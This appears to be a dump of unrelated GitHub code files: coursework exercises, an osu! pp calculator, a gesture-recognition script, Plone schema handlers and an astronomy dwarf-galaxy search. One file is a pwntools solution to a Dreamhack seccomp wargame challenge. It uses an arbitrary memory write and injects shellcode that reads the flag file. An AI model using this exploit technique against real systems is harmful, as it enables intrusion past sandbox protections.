0:\n sec = 60 + sec\n min -= 1\n if min < 0:\n min = 60 + min\n hour -= 1\n if hour < 0:\n hour = 24 + hour\n\n return hour + \":\" + min + \":\" + sec\n\n\ndef collatz_seq(num, to_print=False):\n if to_print:\n print(num, end=\" \")\n count = 0\n while num != 1:\n count = count +1\n if num % 2 == 0:\n num = num // 2\n else:\n num = num*3+1\n if to_print:\n print(num, end=\" \")\n\n return count\n\n\ndef exercise01():\n print(\"********* Exercise 1*********\")\n print(add_to_clock(23, 59, 59, 10))\n #print(add_to_clock(15, 42, 28, 3825))\n #print(add_to_clock(15, 42, 28, -3825))\n #print(add_to_clock(0, 0, 9, -10))\n #print(add_to_clock(23, 59, 59, 3662))\n print(\"*********Exercise 1*********\\n\")\n\ndef exercise02():\n print(\"********* Exercise 2*********\")\n print(collatz_seq(485))\n print(\"*********Exercise 2*********\\n\")","repo_name":"ameydan/ISE102-2021","sub_path":"L1104/Exercises.py","file_name":"Exercises.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"9235093822","text":"from __future__ import annotations\n\nimport json\nfrom os import path\nfrom typing import Any\n\nfrom rosu_pp_py import Calculator, Beatmap\n\nfrom config import osu_folder_path\nfrom gamemode import GameMode\nfrom mods import Mods\n\n\ndef to_dic(obj):\n dic = {}\n for field_key in dir(obj):\n field_value = getattr(obj, field_key)\n if not field_key.startswith(\"__\") and not callable(field_value) \\\n and not field_key.startswith(\"_\") and field_key != \"difficulty\":\n dic[field_key] = field_value\n return dic\n\n\nclass SkipNoneEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, dict):\n # 过滤掉值为 None 的字段\n return {k: v for k, v in obj.items() if v is not None}\n return json.JSONEncoder.default(self, obj)\n\n\ndef json_dump(obj):\n return json.dumps(to_dic(obj))\n\n\ndef calculate(beatmap_id: int, mods: int, mode: int, acc: float, ngeki: int, nkatu: int, n300: int,\n n100: int, n50: int, nmiss: int, combo: int):\n try:\n mode_vn = GameMode(mode).as_vanilla\n if mods & Mods.SCOREV2:\n mods &= ~Mods.SCOREV2\n if mods & Mods.NOFAIL:\n mods &= ~Mods.NOFAIL\n beatmap = Beatmap(path=path.join(osu_folder_path, str(beatmap_id) + \".osu\"))\n calculator = Calculator(mode=mode_vn, mods=mods, acc=acc, n_geki=ngeki, n_katu=nkatu,\n n300=n300, n100=n100,\n n50=n50,\n n_misses=nmiss)\n calculator.set_combo(combo)\n return 
do_calculate(calculator, beatmap, mode_vn, mods)\n except:\n return None, None, 0.0, None, None\n\n\ndef calculate_prepend(beatmap_id: int, mods: int, acc: float, mode_vn=0):\n beatmap = Beatmap(path=path.join(osu_folder_path, str(beatmap_id) + \".osu\"))\n calculator = Calculator(mode=mode_vn, mods=mods, acc=acc)\n return do_calculate(calculator, beatmap, mode_vn, mods)\n\n\ndef do_calculate(calculator: Calculator, beatmap: Beatmap, mode_vn: int, mods):\n beatmap_attr: Any = calculator.map_attributes(beatmap)\n difficulty_attr: Any = calculator.difficulty(beatmap)\n performance_attr: Any = calculator.performance(beatmap)\n strains: Any = calculator.strains(beatmap)\n performance_point = performance_attr.pp if beatmap_attr.mode == mode_vn else 0.0\n performance_point = performance_point if performance_point <= 8192 else 8192.0\n # We want to calc addition vanilla performance attr for rx scores in order to compare\n performance_vn = {}\n if mods & Mods.RELAX:\n mods &= ~Mods.RELAX\n calculator.set_mods(mods)\n performance_vn = calculator.performance(beatmap)\n return json_dump(difficulty_attr), json_dump(performance_attr), performance_point, json_dump(strains), json_dump(performance_vn)\n","repo_name":"TrueRou/pparking-lot","sub_path":"performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"45472675622","text":"def melon_count(day_number, path):\n \"\"\" day #number abd path for deliveries - produce report.\n \"\"\"\n print(\"==>> Day\", day_number)\n\n delivery_log = open(path)\n for line in delivery_log:\n line = line.rstrip()\n words = line.split('|')\n\n melon = words[0]\n count = words[1]\n amount = words[2]\n # list unpack method: melon, count, amount = words\n # \n print(f\"Delivered {count} {melon}s for total of ${amount}\")\n\n delivery_log.close()\n\nmelon_count(1, \"um-deliveries-day-1.txt\")\nmelon_count(2, \"um-deliveries-day-2.txt\")\nmelon_count(3, \"um-deliveries-day-3.txt\")\n","repo_name":"SandyC1000/Hackbright1","sub_path":"homework/melon-delivery-report/produce_summary.py","file_name":"produce_summary.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"29539867488","text":"import cv2\nimport numpy as np\nimport imutils\nfrom imutils.video import VideoStream\n'from adafruit_servokit import ServoKit'\ntry:\n import logging\n logging.getLogger(\"tensorflow\").setLevel(logging.CRITICAL)\nfinally:\n import tensorflow as tf\n import tflearn\n from tflearn.layers.conv import conv_2d, max_pool_2d\n from tflearn.layers.core import input_data, dropout, fully_connected\n from tflearn.layers.estimator import regression\n\ntf.reset_default_graph()\nconvnet = input_data(shape=[None, 89, 100, 1], name='input')\nconvnet = conv_2d(convnet, 32, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = conv_2d(convnet, 64, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = conv_2d(convnet, 128, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = conv_2d(convnet, 256, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = conv_2d(convnet, 256, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = conv_2d(convnet, 128, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = conv_2d(convnet, 64, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = 
fully_connected(convnet, 1000, activation='relu')\nconvnet = dropout(convnet, 0.75)\nconvnet = fully_connected(convnet, 3, activation='softmax')\nconvnet = regression(\n convnet, optimizer='adam', learning_rate=0.001,\n loss='categorical_crossentropy', name='regression')\n\nmodel = tflearn.DNN(convnet, tensorboard_verbose=0)\nmodel.load(\"TrainedModel/GestureRecogModel.tfl\")\n\nclassName = \"None\"\nbg = None\npredictedClass, confidence = None, 0\nnum_frames = 0\ntop, right, bottom, left = 10, 350, 225, 590\n\nvs = VideoStream(src=0).start()\n# vs = VideoStream(usePiCamera=True).start()\ncv2.waitKey(1000)\n\n'kit = ServoKit(channels=16)'\nchannel = 0\nblock = 0\n'kit.servo[channel].angle = 0'\n\nwhile True:\n '''if predictedClass == 1 and block == 0:\n kit.servo[channel].angle = 0\n block = 1\n elif predictedClass == 2 and block == 1:\n kit.servo[channel].angle = 120\n block = 0'''\n\n frame = vs.read()\n frame = imutils.resize(frame, width=700)\n frame = cv2.flip(frame, 1)\n roi = frame[top:bottom, right:left]\n gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (7, 7), 0)\n\n if num_frames < 30:\n if bg is None:\n bg = gray.astype(\"float\")\n\n cv2.accumulateWeighted(gray, bg, 0.5)\n num_frames += 1\n else:\n diff = cv2.absdiff(bg.astype(\"uint8\"), gray)\n thresholded = cv2.threshold(diff, 25, 255, cv2.THRESH_BINARY)[1]\n (cnts, _) = cv2.findContours(thresholded, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n predictedClass, confidence = None, 0\n if len(cnts) != 0:\n segmented = max(cnts, key=cv2.contourArea)\n\n cv2.drawContours(frame, [segmented + (right, top)], -1, (0, 100, 250))\n wsize = 100\n hsize = int(thresholded.shape[0] * (wsize / float(thresholded.shape[1])))\n thresholded_ = cv2.resize(thresholded, (wsize, hsize), interpolation=cv2.INTER_AREA)\n prediction = model.predict([thresholded_.reshape(89, 100, 1)])\n\n predictedClass, confidence = np.argmax(prediction), (np.amax(prediction) / (prediction[0][0] + prediction[0][1] + prediction[0][2]))\n # cv2.imshow(\"Thesholded\", thresholded)\n\n if confidence < 0.9:\n className = \"None\"\n else:\n if predictedClass == 1:\n className = \"Open hand\"\n elif predictedClass == 2:\n className = \"Closed hand\"\n\n cv2.putText(\n frame, f\"Pedicted Class : {className}\",\n (30, 455), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n\n cv2.putText(\n frame, f\"Confidence : {round(confidence * 100, 2)} %\",\n (30, 500), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n\n cv2.putText(\n frame, 'wait' if num_frames < 30 else 'start',\n (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1,\n (0, 0, 255) if num_frames < 30 else (0, 255, 0), 2)\n\n cv2.rectangle(frame, (left, top), (right, bottom), (255, 0, 0), 2)\n\n cv2.imshow(\"PiCamera\", frame)\n if cv2.waitKey(100) == 27:\n break\n\nvs.stop()\ncv2.destroyAllWindows()\n","repo_name":"ovvladimir/Robot","sub_path":"hand_control/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"7806090499","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 2 13:19:23 2020\n@author: tom verguts\nHebbian learning by cost minimization\nlook at the train_x and train_y patterns; can you predict what W will look like after training?\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\n\nnp.set_printoptions(precision = 2)\n# initialize variables\ntrain_x = np.array([[1, 1, 0],\n\t\t\t\t [0, 1, 1]])\ntrain_t = np.array([[1, 
0],\n\t\t\t\t\t[0, 1]]) # t for target\nepochs = 10\nlearning_rate = 0.05\n\n# define TensorFlow components\nX = tf.Variable(initial_value = np.random.randn(1, train_x.shape[1]).astype(np.float32), name = \"input\")\nT = tf.Variable(initial_value = np.random.randn(1, train_t.shape[1]).astype(np.float32), name = \"output\")\nW = tf.Variable(initial_value = (np.random.randn(train_x.shape[1], train_t.shape[1])/100).astype(np.float32), name = \"weights\")\n\ndef cost():\n \"\"\" this cost function (eq (3.1) in MCP book) will be optimized\"\"\"\n return tf.matmul(-tf.matmul(X, W), tf.transpose(T)) \n\nopt = tf.keras.optimizers.SGD(learning_rate = learning_rate) # SGD = stochastic gradient descent\n\nfor epoch in range(epochs):\n for (x, t) in zip(train_x, train_t):\n X.assign(x[np.newaxis,:])\n T.assign(t[np.newaxis,:])\n opt.minimize(cost, [W])\n if not epoch%10: # plot output only every 10 epochs\n w = W.numpy()\n print(w, '\\n')\n\t\t\t\n","repo_name":"CogComNeuroSci/modeling-master","sub_path":"code_by_chapter/Chapter_3/ch3_tf2_hebb.py","file_name":"ch3_tf2_hebb.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"42"} +{"seq_id":"31617227967","text":"import fiftyone as fo\nimport fiftyone.zoo as foz\n\n# First time running this script, uncomment the line below.\n# dataset = foz.load_zoo_dataset(\"coco-2017\", split=\"validation\")\n\nlabels_file = r\"/home/idlab185/fiftyone/coco-2017/raw/person_keypoints_val2017.json\"\ndataset_file = r\"/home/idlab185/fiftyone/coco-2017/validation\"\n\ndataset = fo.Dataset.from_dir(\n dataset_type = fo.types.COCODetectionDataset,\n label_types = [\"detections\", \"segmentations\", \"keypoints\"],\n dataset_dir = dataset_file,\n labels_path = labels_file)\n\nsession = fo.launch_app(dataset)\nsession.wait()","repo_name":"Victorlouisdg/cloth-keypoint-generation","sub_path":"launch_fiftyone.py","file_name":"launch_fiftyone.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"10011091601","text":"# 1- https://leetcode.com/discuss/interview-question/374440/Twitter-or-OA-2019-or-Weird-Faculty\n\n\ndef weird_faculty(qs):\n\n qs = [-1 if i==0 else 1 for i in qs]\n print(qs)\n n = len(qs)\n my_friend = sum(qs)\n my_answers = 0\n\n for i in range(n):\n print(my_answers, my_friend)\n if my_answers > my_friend:\n return i\n my_answers += qs[i]\n my_friend -= qs[i]\n\n return n \n\n\nprint(weird_faculty([1,1,1,0 , 1]))\n\n","repo_name":"nargesam/CS-ML-Basics","sub_path":"leetcodes/Twitter/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"74992920446","text":"#!/usr/bin/python3\n\nfrom pwn import *\n\n#p = process(\"./seccomp\")\np = remote(\"host1.dreamhack.games\", 10683)\ne = ELF(\"./seccomp\")\ncontext.arch = 'amd64'\n\nsla = lambda t, s: p.sendlineafter(t, s)\n\ndef write(shellcode):\n sla(\"> \", str(1))\n sla(\": \", shellcode)\n\ndef excute():\n sla(\"> \", str(2))\n\ndef aaw(address, value):\n sla(\"> \", str(3))\n sla(\": \", str(address))\n sla(\": \", str(value))\n\n# create shellcode\nsc = asm(\"mov rdi, 0x67616c66\")\nsc += asm(\"push rdi\")\nsc += asm(\"mov rdi, rsp\")\nsc += asm(\"xor rsi, rsi\")\nsc += asm(\"mov rdx, 0xff\")\nsc += asm(\"mov rax, 0x2\")\nsc += asm(\"syscall\")\n#----------# open flag file\n\nsc += asm(\"mov rdi, rax\")\nsc += 
asm(\"mov rsi, {}\".format(hex(e.bss() + 0x28)))\nsc += asm(\"mov rdx, 0xff\")\nsc += asm(\"xor rax, rax\")\nsc += asm(\"syscall\")\n#----------# read content of flag file in bss\n\nsc += asm(\"mov rdi, 0x1\")\nsc += asm(\"mov rsi, {}\".format(hex(e.bss() + 0x28)))\nsc += asm(\"mov rdx, 0xff\")\nsc += asm(\"mov rax, 0x1\")\nsc += asm(\"syscall\")\n#----------# write flag\n\naaw(0x602090, 0x2)\nwrite(sc)\nexcute()\n\np.sendline(\"flag\")\n\np.interactive()\n","repo_name":"rheehot/Security-1","sub_path":"wargame/dreamhack/dreamhack_pwnable_seccomp.py","file_name":"dreamhack_pwnable_seccomp.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"40667272982","text":"from z3c.form.interfaces import IFieldWidget, IValidator\nfrom z3c.form.util import getSpecification\nfrom z3c.form.validator import WidgetValidatorDiscriminators\nfrom zope.component import provideAdapter\nfrom zope.interface import implements, Interface\nfrom zope.interface.interface import InterfaceClass\n\nfrom plone.supermodel.utils import ns\nfrom plone.supermodel.parser import IFieldMetadataHandler\n\nfrom plone.autoform.interfaces import OMITTED_KEY, WIDGETS_KEY, MODES_KEY, ORDER_KEY\nfrom plone.autoform.interfaces import READ_PERMISSIONS_KEY, WRITE_PERMISSIONS_KEY\n\nfrom plone.autoform.interfaces import FORM_NAMESPACE, FORM_PREFIX\nfrom plone.autoform.interfaces import SECURITY_NAMESPACE, SECURITY_PREFIX\n\nfrom plone.autoform.utils import resolveDottedName\n\nclass FormSchema(object):\n \"\"\"Support the form: namespace in model definitions.\n \"\"\"\n implements(IFieldMetadataHandler)\n \n namespace = FORM_NAMESPACE\n prefix = FORM_PREFIX\n \n def _add(self, schema, key, name, value, expected=None):\n if expected is not None:\n obj = resolveDottedName(value)\n if not expected.implementedBy(obj):\n raise ValueError(\"%s not implemented by %s\"\n % (expected.__identifier__, value))\n tagged_value = schema.queryTaggedValue(key, {})\n tagged_value[name] = value\n schema.setTaggedValue(key, tagged_value)\n \n def _add_order(self, schema, name, direction, relative_to):\n tagged_value = schema.queryTaggedValue(ORDER_KEY, [])\n tagged_value.append((name, direction, relative_to,))\n schema.setTaggedValue(ORDER_KEY, tagged_value)\n \n def _add_interface_values(self, schema, key, name, values):\n tagged_value = schema.queryTaggedValue(key, [])\n values = values.split(' ')\n for value in values:\n if ':' in value:\n (interface_dotted_name, value) = value.split(':')\n interface = resolveDottedName(interface_dotted_name)\n if not isinstance(interface, InterfaceClass):\n raise ValueError(\n \"%s not an Interface.\"% interface_dotted_name)\n else:\n interface = Interface\n tagged_value.append((interface, name, value))\n schema.setTaggedValue(key, tagged_value)\n \n def _add_validator(self, field, value):\n validator = resolveDottedName(value)\n if not IValidator.implementedBy(validator):\n raise ValueError(\n \"z3c.form.interfaces.IValidator not implemented by %s.\"\n % value)\n provideAdapter(validator,\n (None, None, None, getSpecification(field), None),\n IValidator,\n )\n\n def read(self, fieldNode, schema, field):\n name = field.__name__\n \n widget = fieldNode.get( ns('widget', self.namespace) )\n mode = fieldNode.get( ns('mode', self.namespace) )\n omitted = fieldNode.get( ns('omitted', self.namespace) )\n before = fieldNode.get( ns('before', self.namespace) )\n after = fieldNode.get( ns('after', self.namespace) )\n validator = 
fieldNode.get( ns('validator', self.namespace) )\n\n if widget:\n self._add(schema, WIDGETS_KEY, name, widget, IFieldWidget)\n if mode:\n self._add_interface_values(schema, MODES_KEY, name, mode)\n if omitted:\n self._add_interface_values(schema, OMITTED_KEY, name, omitted)\n if before:\n self._add_order(schema, name, 'before', before)\n if after:\n self._add_order(schema, name, 'after', after)\n if validator:\n self._add_validator(field, validator)\n\n def write(self, fieldNode, schema, field):\n name = field.__name__\n \n widget = schema.queryTaggedValue(WIDGETS_KEY, {}).get(name, None)\n mode = [(i,v) for i,n,v in schema.queryTaggedValue(MODES_KEY, []) if n == name]\n omitted = [(i,v) for i,n,v in schema.queryTaggedValue(OMITTED_KEY, []) if n == name]\n order = [(d,v) for n,d,v in schema.queryTaggedValue(ORDER_KEY, []) if n == name]\n \n if widget is not None:\n if not isinstance(widget, basestring):\n widget = \"%s.%s\" % (widget.__module__, widget.__name__)\n fieldNode.set(ns('widget', self.namespace), str(widget))\n \n mode_values = []\n for interface, value in mode:\n if interface is not Interface:\n value = \"%s:%s\" % (interface.__identifier__, value)\n mode_values.append(value)\n if mode_values:\n fieldNode.set(ns('mode', self.namespace), \" \".join(mode_values))\n \n omitted_values = []\n for interface, value in omitted:\n if interface is not Interface:\n value = \"%s:%s\" % (interface.__identifier__, value)\n omitted_values.append(value)\n if omitted_values:\n fieldNode.set(ns('omitted', self.namespace), \" \".join(omitted_values))\n\n for direction, relative_to in order:\n if direction == 'before':\n fieldNode.set(ns('before', self.namespace), relative_to)\n elif direction == 'after':\n fieldNode.set(ns('after', self.namespace), relative_to)\n\nclass SecuritySchema(object):\n \"\"\"Support the security: namespace in model definitions.\n \"\"\"\n implements(IFieldMetadataHandler)\n \n namespace = SECURITY_NAMESPACE\n prefix = SECURITY_PREFIX\n \n def read(self, fieldNode, schema, field):\n name = field.__name__\n \n read_permission = fieldNode.get(ns('read-permission', self.namespace))\n write_permission = fieldNode.get(ns('write-permission', self.namespace))\n \n read_permissions = schema.queryTaggedValue(READ_PERMISSIONS_KEY, {})\n write_permissions = schema.queryTaggedValue(WRITE_PERMISSIONS_KEY, {})\n \n if read_permission:\n read_permissions[name] = read_permission\n schema.setTaggedValue(READ_PERMISSIONS_KEY, read_permissions)\n \n if write_permission:\n write_permissions[name] = write_permission\n schema.setTaggedValue(WRITE_PERMISSIONS_KEY, write_permissions)\n\n def write(self, fieldNode, schema, field):\n name = field.__name__\n \n read_permission = schema.queryTaggedValue(READ_PERMISSIONS_KEY, {}).get(name, None)\n write_permission = schema.queryTaggedValue(WRITE_PERMISSIONS_KEY, {}).get(name, None)\n \n if read_permission:\n fieldNode.set(ns('read-permission', self.namespace), read_permission)\n if write_permission:\n fieldNode.set(ns('write-permission', self.namespace), write_permission)","repo_name":"pchanxxx/msc-buidout","sub_path":"msc/eggs/plone.autoform-1.0-py2.6.egg/plone/autoform/supermodel.py","file_name":"supermodel.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"32047684461","text":"#!/usr/bin/env python\n\n# 1) pull data from object table for 2x2 deg\n# star/galaxy separation, color cut\n# pull coverage information from coverage table\n\n\n\n# 2) 
color cut in g-r\n\n# 3) make density map\n\n# 4) correct for covering fraction, set missing data to average value\n\n# 5) use luminosity function to correct for depth\n# try to to calculate this empircally, density vs. depth\n# or query Besancon at that position and figure out luminosity function\n\n# 6) mexican hat filter\n\n# 7) run peak finder, store peaks\n# ra, dec, significance, density above the background, shape parameter\n\n# 8) loop over peaks, do narrow cone search (size depends on shape)\n# everything from catalog around select portion of sky\n\n# 9) visualization to look at CMD and possibly an image\n\n# 10) machine learning to weed out the contaminants, large galaxies, galaxy clusters, etc.\n\n# Python 2/3 compatibility\nfrom __future__ import print_function # to use print() as a function in Python 2\n\ntry:\n input = raw_input # use 'input' function in both Python 2 and 3\nexcept NameError:\n pass\n\n# std lib\nfrom getpass import getpass\n\n# 3rd party\nimport pandas as pd\nimport numpy as np\nimport pylab as plt\nimport matplotlib\nfrom astropy import utils, io, convolution, stats, wcs\nfrom astropy.visualization import make_lupton_rgb\nfrom astropy import units as u\nfrom astropy.stats import median_absolute_deviation as mad\nfrom astropy.table import Table\nfrom scipy.interpolate import interp1d\nfrom scipy import arange, array, exp\n#%matplotlib inline\nimport healpy as hp\nfrom photutils import find_peaks, data_properties\nimport logging\nimport socket\nimport os\nimport sys\nimport time\n\n# Data Lab\nfrom dl import authClient as ac, queryClient as qc, storeClient as sc, helpers\n\n#Simple Image Access (SIA) service\nfrom pyvo.dal import sia\nDEF_ACCESS_URL = \"http://datalab.noao.edu/sia\"\nsvc = sia.SIAService(DEF_ACCESS_URL)\n\n# Quiet the Astropy warnings\nimport warnings\nfrom astropy.utils.exceptions import AstropyWarning\nwarnings.simplefilter('ignore', category=AstropyWarning)\n\n\n# Extrapolation function\ndef extrap1d(interpolator):\n xs = interpolator.x\n ys = interpolator.y\n\n def pointwise(x):\n if x < xs[0]:\n return ys[0]+(x-xs[0])*(ys[1]-ys[0])/(xs[1]-xs[0])\n elif x > xs[-1]:\n return ys[-1]+(x-xs[-1])*(ys[-1]-ys[-2])/(xs[-1]-xs[-2])\n else:\n return interpolator(x)\n\n def ufunclike(xs):\n return array(map(pointwise, array(xs)))\n\n return ufunclike\n\n# A function to retrieve data from a point on the sky\ndef getData (ra,dec,radius=1.0,columns='*'):\n\n query_template = \\\n \"\"\"SELECT {0:s} FROM nsc_dr1.object\n WHERE q3c_radial_query(ra,dec,{1:f},{2:f},{3:f})\"\"\"\n\n query = query_template.format(columns,ra,dec,radius)\n print(query)\n \n try:\n result = qc.query(token,sql=query) # by default the result is a CSV formatted string\n except Exception as e:\n print(e.message)\n \n df = helpers.convert(result,'table') # pandas\n \n return df\n\n# A function to retrieve data from a point on the sky\ndef getDataCuts (ra,dec,radius=1.0,columns='ra,dec,gmag,rmag',colcutlo=None,colcuthi=None,classcut=None,fwhmcut=None,errcut=None):\n\n query_template = \\\n \"\"\"SELECT {0:s} FROM nsc_dr1.object\n WHERE q3c_radial_query(ra,dec,{1:f},{2:f},{3:f})\"\"\"\n # (gmag-rmag)>({4:f}) and (gmag-rmag)<{5:f} and class_star>{6:f} and\n # fwhm<{7:f} and gerr<{8:f} and rerr<{8:f}\n\n query = query_template.format(columns,ra,dec,radius,colcutlo,colcuthi,classcut,fwhmcut,errcut)\n if colcutlo is not None: query+=\" and (gmag-rmag)>(\"+\"{0:f}\".format(colcutlo)+\")\"\n if colcuthi is not None: query+=\" and (gmag-rmag)<\"+\"{0:f}\".format(colcuthi)\n if classcut is 
not None: query+=\" and class_star>\"+\"{0:f}\".format(classcut)\n if fwhmcut is not None: query+=\" and fwhm<\"+\"{0:f}\".format(fwhmcut)\n if errcut is not None: query+=\" and gerr<\"+\"{0:f}\".format(errcut)\n if errcut is not None: query+=\" and rerr<\"+\"{0:f}\".format(errcut)\n print(query)\n \n try:\n result = qc.query(token,sql=query) # by default the result is a CSV formatted string\n except Exception as e:\n print(e.message)\n \n df = helpers.convert(result,'table') # pandas\n \n return df\n\n# A function to retrieve data from a point on the sky\ndef getCovData (ra,dec,radius=1.0,columns='*'):\n\n query_template = \\\n \"\"\"SELECT {0:s} FROM nsc_dr1.coverage\n WHERE q3c_radial_query(ra,dec,{1:f},{2:f},{3:f})\"\"\"\n\n query = query_template.format(columns,ra,dec,radius)\n print(query)\n \n try:\n result = qc.query(token,sql=query) # by default the result is a CSV formatted string\n except Exception as e:\n print(e.message)\n \n df = helpers.convert(result,'pandas')\n \n return df\n\n# A Mexican-hat convolution filter\ndef dwarf_filter (ra,dec,fwhm_small=2.0,fwhm_big=20):\n\n # Based on Koposov et al. (2008).\n # Code by Ken Mighell and Mike Fitzpatrick.\n # Minor edits by Rorbert Nikutta.\n \n x, y = ra, dec\n\n # Information about declination (y) [degrees]\n ymean = (y.min() + y.max()) / 2.0\n ydiff_arcmin = (y.max() - y.min()) * 60.0 # convert from degrees to arcmin\n\n # Information about right ascension (x) [degrees in time]:\n xdiff = x.max() - x.min() # angular separation [degrees (time)] \n xmean = (x.min() + x.max())/2.0\n\n # convert from degrees in time to separation in angular degrees:\n xdiff_angular = (x.max() - x.min()) * np.cos(ymean*(np.pi/180.0))\n\n # convert from degress to arcmin\n xdiff_angular_arcmin = xdiff_angular * 60.0 \n\n # Get the number of one-arcmin pixels in the X and Y directions:\n nx = np.rint (xdiff_angular_arcmin).astype('int')\n ny = np.rint (ydiff_arcmin).astype('int')\n \n # Create a two-dimensional histogram of the raw counts:\n Counts, xedges, yedges = np.histogram2d (x, y, (nx,ny) )\n extent = [xedges[0], xedges[-1], yedges[0], yedges[-1]]\n raw_hist = np.rot90(Counts).copy() # hack around Pythonic weirdness\n\n # Make the small and big Gaussian kernels with a standard deviation\n # of the given FWHM in arcmin^2 pixels.\n kernel_small = convolution.Gaussian2DKernel(fwhm_small/2.35,factor=1)\n kernel_big = convolution.Gaussian2DKernel(fwhm_big/2.35,factor=1)\n\n # Compute the differential convolution kernels.\n conv_big = convolution.convolve (raw_hist, kernel_big)\n conv_small = convolution.convolve (raw_hist, kernel_small)\n conv_delta = conv_small - conv_big\n delta = conv_delta.copy()\n\n # Compute statistics and the floor\n mean = np.mean (delta, dtype='float64')\n sigma = np.std (delta, dtype='float64')\n sigmaRaw = np.std(raw_hist,dtype='float64')\n median = np.median (delta) # not used\n floor = mean \n\n # Clip to specified limits.\n clipped = delta.copy()\n clipped[ delta < floor ] = floor\n\n # Return the computed fields.\n return raw_hist, extent, delta, clipped, sigma\n\n# A little function to download the deepest stacked images\n# adapted from R. 
Nikutta\ndef download_deepest_image(ra,dec,fov=0.1,band='g'):\n imgTable = svc.search((ra,dec), (fov/np.cos(dec*np.pi/180), fov), verbosity=2).votable.to_table()\n print(\"The full image list contains\", len(imgTable), \"entries\")\n \n sel0 = imgTable['obs_bandpass'].astype(str)==band\n sel = sel0 & ((imgTable['proctype'].astype(str)=='Stacked') & (imgTable['prodtype'].astype(str)=='image')) # basic selection\n Table = imgTable[sel] # select\n if (len(Table)>0):\n row = Table[np.argmax(Table['exptime'].data.data.astype('float'))] # pick image with longest exposure time\n url = row['access_url'].decode() # get the download URL\n print ('downloading deepest image...')\n image = io.fits.getdata(utils.data.download_file(url,cache=True,show_progress=False,timeout=120))\n\n else:\n print ('No image available.')\n image=None\n \n return image\n\n# Multi panel image plotter\ndef plot_images(images,geo=None,panelsize=4,bands=list('gri'),cmap=matplotlib.cm.gray_r):\n n = len(images)\n if geo is None: geo = (n,1)\n \n fig = plt.figure(figsize=(geo[0]*panelsize,geo[1]*panelsize))\n for j,img in enumerate(images):\n ax = fig.add_subplot(geo[1],geo[0],j+1)\n if img is not None:\n print(img.min(),img.max())\n vmin = np.median(img)-2*np.std(img)\n vmax = np.median(img)+2*np.std(img)\n ax.imshow(img,origin='lower',interpolation='none',cmap=cmap,norm=matplotlib.colors.LogNorm(vmin=vmin, vmax=vmax))\n ax.set_title('%s band' % bands[j])\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n\n# Create a WCS for a tangent plane projection in our region\ndef get_wcs(ra,dec,image,fov=1.,unit='deg',projection=(\"RA---TAN\",\"DEC--TAN\")):\n npix = image.shape[0]\n crpix = npix/2 + 1\n cdelt = fov/float(npix)\n w = wcs.WCS(naxis=2)\n w.wcs.cunit = (unit,unit)\n w.wcs.crpix = (crpix,crpix)\n w.wcs.cdelt = np.array((-cdelt,cdelt))\n w.wcs.ctype = projection\n w.wcs.crval = (ra,dec) #coords.ra.to(unit).value, coords.dec.to(unit).value)\n return w\n\ndef plotpanel(axid,x,y,title='',xlim=(-1,2),ylim=(25.2,14)):\n ax = fig.addxs_subplot(axid)\n ax.scatter(x,y,marker='.',s=10, alpha=0.8)\n ax.set_xlabel(x.name)\n ax.set_ylabel(y.name)\n ax.set_xlim(xlim)\n ax.set_ylim(ylim)\n ax.set_title(title)\n\n\nif __name__ == \"__main__\":\n\n hostname = socket.gethostname()\n host = hostname.split('.')[0]\n\n # Version\n verdir = \"v1\"\n if len(sys.argv) > 2:\n version = sys.argv[3]\n verdir = version if version.endswith('/') else version+\"/\"\n\n # on thing/hulk use\n if (host == \"thing\") | (host == \"hulk\"):\n dir = \"/dl1/users/dnidever/nsc/dwarfs/\"+verdir\n # on gp09 use\n if (host == \"gp09\") | (host == \"gp08\") | (host == \"gp07\") | (host == \"gp06\") | (host == \"gp05\"):\n dir = \"/net/dl1/users/dnidever/nsc/dwarfs/\"+verdir\n if (host == \"NideverMacBookPro\"):\n dir = \"/Users/nidever/datalab/nsc/dwarfs/\"+verdir\n \n t0 = time.time()\n\n print(sys.argv)\n\n # Not enough inputs\n n = len(sys.argv)\n if n < 2:\n print(\"Syntax - ns_dwarfs_hpix.py hpix radius version\")\n sys.exit()\n\n # Inputs\n hpix = np.int(sys.argv[1])\n radius = 